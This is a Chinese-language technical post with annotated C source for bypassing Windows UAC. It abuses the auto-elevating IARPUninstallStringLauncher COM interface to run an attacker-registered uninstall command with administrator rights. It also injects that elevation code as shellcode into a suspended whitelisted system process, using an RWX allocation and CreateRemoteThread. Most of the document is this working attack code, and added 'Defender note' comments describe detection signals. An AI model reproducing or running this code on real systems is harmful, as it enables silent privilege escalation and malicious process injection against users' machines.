巧用COM接口IARPUninstallStringLauncher绕过UAC
巧用COM接口IARPUninstallStringLauncher绕过UAC
http://www.freebuf.com/articles/system/116611.html
编码实现绕过UAC的功能
核心提权代码
/*
 * CoCreateInstanceAsAdmin: binds a COM class through the UAC elevation
 * moniker ("Elevation:Administrator!new:{CLSID}") using CoGetObject. This is
 * the shape of Microsoft's documented elevation-moniker helper; the binding
 * is silent only for classes the OS marks as auto-elevating, otherwise UAC
 * consent is requested in the caller's context.
 *
 * hwnd   - window handle stored in BIND_OPTS3 (NULL when called from _tmain).
 * rclsid - class to activate; riid - interface requested; ppv - receives it.
 * Returns the failing HRESULT of StringCchPrintf, else CoGetObject's result.
 *
 * Defender note: the observable event is a medium-integrity, non-Microsoft
 * process binding an Elevation: moniker followed by an elevated COM server
 * process starting; raising UAC to "Always notify" is reported to remove the
 * silent path by prompting for auto-elevation as well.
 */
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void ** ppv)
{
    BIND_OPTS3 bo;
    WCHAR wszCLSID[50];
    WCHAR wszMonikerName[300];
    /* Return value of StringFromGUID2 is not checked; 50 WCHARs hold a braced GUID. */
    StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
    HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName)/sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr))
        return hr;
    memset(&bo, 0, sizeof(bo));
    bo.cbStruct = sizeof(bo);
    bo.hwnd = hwnd;
    /* Out-of-process activation: the elevated object lives in a separate server process. */
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;
    return CoGetObject(wszMonikerName, &bo, riid, ppv);
}

/*
 * Entry point: activates the IARPUninstallStringLauncher class elevated and
 * calls its LaunchUninstallStringAndWait method with a GUID. argc/argv are
 * unused. The CLSID and IID string literals are the values given by the
 * article; IIDFromString returns S_OK (0) on success, so any non-zero
 * HRESULT exits before COM is initialised.
 *
 * The method pointers are fetched by hand from the vtable: *(DWORD*)ppv is
 * the vtable pointer, +8 is IUnknown::Release (slot 2) and +12 is the first
 * slot after IUnknown (assuming the interface derives directly from
 * IUnknown — TODO confirm). DWORD-sized pointer arithmetic ties this to
 * 32-bit builds. The GUID passed to LaunchUninstallStringAndWait is
 * presumably the uninstall entry registered by AddUninstallItem in the
 * injector (see BypassUacWithInject); the command stored there is what the
 * elevated server executes.
 *
 * Defender note: the elevated child is the stored uninstall command, so the
 * process tree (auto-elevated COM server -> attacker-registered uninstall
 * string) and Uninstall-key writes by a medium-integrity process are the
 * detection anchors. The results of CoInitialize/CoUninitialize are ignored.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    CLSID clsid;
    IID iid;
    LPVOID ppv = NULL;
    HRESULT hr;
    PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait pfn_LaunchUninstallStringAndWait = NULL;
    PFN_IARPUninstallStringLauncher_Release pfn_IARPUninstallStringLauncher_Release = NULL;
    /* S_OK is 0: a non-zero HRESULT from either conversion aborts the run. */
    if (IIDFromString(L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}", &clsid) ||
        IIDFromString(L"{F885120E-3789-4FD9-865E-DC9B4A6412D2}", &iid))
        return 0;
    CoInitialize(NULL);
    hr = CoCreateInstanceAsAdmin(NULL, clsid, iid, &ppv);
    if (SUCCEEDED(hr))
    {
        /* Manual vtable walk, 32-bit layout: byte offset 12 = slot 3, offset 8 = slot 2 (Release). */
        pfn_LaunchUninstallStringAndWait = (PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait)(*(DWORD*)(*(DWORD*)ppv + 12));
        pfn_IARPUninstallStringLauncher_Release = (PFN_IARPUninstallStringLauncher_Release)(*(DWORD*)(*(DWORD*)ppv + 8));
        if (pfn_LaunchUninstallStringAndWait && pfn_IARPUninstallStringLauncher_Release)
        {
            pfn_LaunchUninstallStringAndWait((LPVOID*)ppv, 0, L"{18E78D31-BBCC-4e6f-A21D-0A15BBC62D49}", 0, NULL);
            pfn_IARPUninstallStringLauncher_Release((LPVOID*)ppv);
        }
    }
    CoUninitialize();
    return 0;
}
为什么呢?因为执行该提权代码的宿主进程身份是不可信的,所以我们需要想办法让这段代码在 Windows 的白名单程序中运行。所以很直接地会想到将这段代码注入到诸如计算器、记事本、桌面等程序中去执行,这样就不会弹出 UAC 框了。
将提权代码转换为shellcode并注入到白名单程序中执行
关键代码:
/*
 * BypassUacWithInject: copies the g_ByPassUac blob (SizeOfBypassUac bytes;
 * presumably the elevation code above compiled to position-independent
 * code — TODO confirm) into a freshly created, suspended instance of
 * InjectTarget taken from the system directory, and runs it there on a
 * remote thread. lpExe is handed to AddUninstallItem before the injection
 * and the entry is removed by DeleteUninstallItem afterwards.
 *
 * Returns bRet, which is only ever FALSE, so the return value carries no
 * success information. hModule and hThread are assigned but never read.
 * Most Win32 return values (WriteProcessMemory, CreateRemoteThread,
 * GetExitCodeProcess) are not checked.
 *
 * Defender note: CreateProcess(CREATE_SUSPENDED) -> VirtualAllocEx with
 * PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> CreateRemoteThread is the
 * canonical remote-thread injection sequence and a high-fidelity detection
 * signal by itself: an RWX allocation in another process and a remote
 * thread whose start address lies outside any mapped image are what
 * endpoint sensors key on. The temporary Uninstall entry written around the
 * injection is a second, registry-side artefact.
 */
BOOL BypassUacWithInject(LPTSTR lpExe)
{
    HMODULE hModule = GetModuleHandle(NULL);
    TCHAR cAppName[MAX_PATH] = {0};
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID lpMalwareBaseAddr;
    LPVOID lpNewVictimBaseAddr;
    HANDLE hThread;
    DWORD dwExitCode;
    BOOL bRet = FALSE;
    lpMalwareBaseAddr = g_ByPassUac;
    /* Registers the uninstall entry that the elevated launcher will later execute. */
    AddUninstallItem(lpExe);
    /* Target path = system directory + InjectTarget; _tcscat is unbounded. */
    GetSystemDirectory(cAppName, MAX_PATH);
    _tcscat(cAppName, InjectTarget);
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    /* Whitelisted host is started suspended so its primary thread never runs its own code first. */
    if (CreateProcess(cAppName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,NULL, NULL,&si, &pi) == 0)
    {
        return bRet;
    }
    /* RWX allocation in the target process: the classic injection marker. */
    lpNewVictimBaseAddr = VirtualAllocEx(pi.hProcess,NULL,SizeOfBypassUac,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if (lpNewVictimBaseAddr == NULL)
    {
        return bRet;
    }
    WriteProcessMemory(pi.hProcess, lpNewVictimBaseAddr, (LPCVOID)lpMalwareBaseAddr, SizeOfBypassUac, NULL);
    hThread = CreateRemoteThread(pi.hProcess, 0, 0, (LPTHREAD_START_ROUTINE)lpNewVictimBaseAddr, NULL, 0, NULL);
    /* Waits on the primary (suspended) thread handle, not on hThread. */
    WaitForSingleObject(pi.hThread, INFINITE);
    GetExitCodeProcess(pi.hProcess, &dwExitCode);
    TerminateProcess(pi.hProcess, 0);
    DeleteUninstallItem();
    return bRet;
}